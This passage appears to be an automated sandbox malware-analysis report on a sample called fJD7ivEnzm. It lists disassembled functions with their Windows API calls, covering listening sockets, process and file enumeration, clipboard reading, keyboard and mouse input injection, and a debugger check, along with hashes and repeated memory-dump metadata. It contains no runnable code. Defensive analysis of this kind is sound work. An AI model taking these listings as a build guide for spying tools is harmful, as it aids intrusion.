                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_strncmp
                                                                          • String ID: @oH$\$^$h
                                                                          • API String ID: 2175499884-3701065813
                                                                          • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                                          • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                                                                          • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                                          • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                                                                          Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                          • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                                          • String ID:
                                                                          • API String ID: 540024437-0
                                                                          • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                          • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                          • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                          • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                          Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                          • API String ID: 0-2872873767
                                                                          • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                          • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                          • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                          • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                          Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                          • __wsplitpath.LIBCMT ref: 00475644
                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                          • _wcscat.LIBCMT ref: 00475657
                                                                          • __wcsicoll.LIBCMT ref: 0047567B
                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                          • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                          • String ID:
                                                                          • API String ID: 2547909840-0
                                                                          • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                          • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                          • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                          • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                          Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                          • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                          • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                          • FindClose.KERNEL32(?), ref: 004525FF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                          • String ID: *.*$\VH
                                                                          • API String ID: 2786137511-2657498754
                                                                          • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                          • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                          • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                          • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                          Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                          • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                          • String ID: pqI
                                                                          • API String ID: 2579439406-2459173057
                                                                          • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                          • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                          • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                          • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                          Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wcsicoll.LIBCMT ref: 00433349
                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                          • __wcsicoll.LIBCMT ref: 00433375
                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicollmouse_event
                                                                          • String ID: DOWN
                                                                          • API String ID: 1033544147-711622031
                                                                          • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                          • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                          • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                          • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                          Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                          • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                          • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                          • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                          • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: KeyboardMessagePostState$InputSend
                                                                          • String ID:
                                                                          • API String ID: 3031425849-0
                                                                          • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                          • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                          • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                          • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                          Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 4170576061-0
                                                                          • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                          • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                          • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                          • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                          Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                          • IsWindowVisible.USER32 ref: 0047A368
                                                                          • IsWindowEnabled.USER32 ref: 0047A378
                                                                          • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                          • IsIconic.USER32 ref: 0047A393
                                                                          • IsZoomed.USER32 ref: 0047A3A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                          • String ID:
                                                                          • API String ID: 292994002-0
                                                                          • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                          • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                          • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                          • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                          Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                          • CoInitialize.OLE32(00000000), ref: 00478442
                                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                          • CoUninitialize.OLE32 ref: 0047863C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                          • String ID: .lnk
                                                                          • API String ID: 886957087-24824748
                                                                          • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                          • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                          • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                          • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                          Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                          • CloseClipboard.USER32 ref: 0046DD0D
                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                          • CloseClipboard.USER32 ref: 0046DD41
                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                          • CloseClipboard.USER32 ref: 0046DD99
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                          • String ID:
                                                                          • API String ID: 15083398-0
                                                                          • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                          • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                          • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                          • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                          Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: U$\
                                                                          • API String ID: 4104443479-100911408
                                                                          • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                          • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                          • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                          • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                          Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                          • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                          • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                          • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                          Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                          • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                          Memory Dump Source
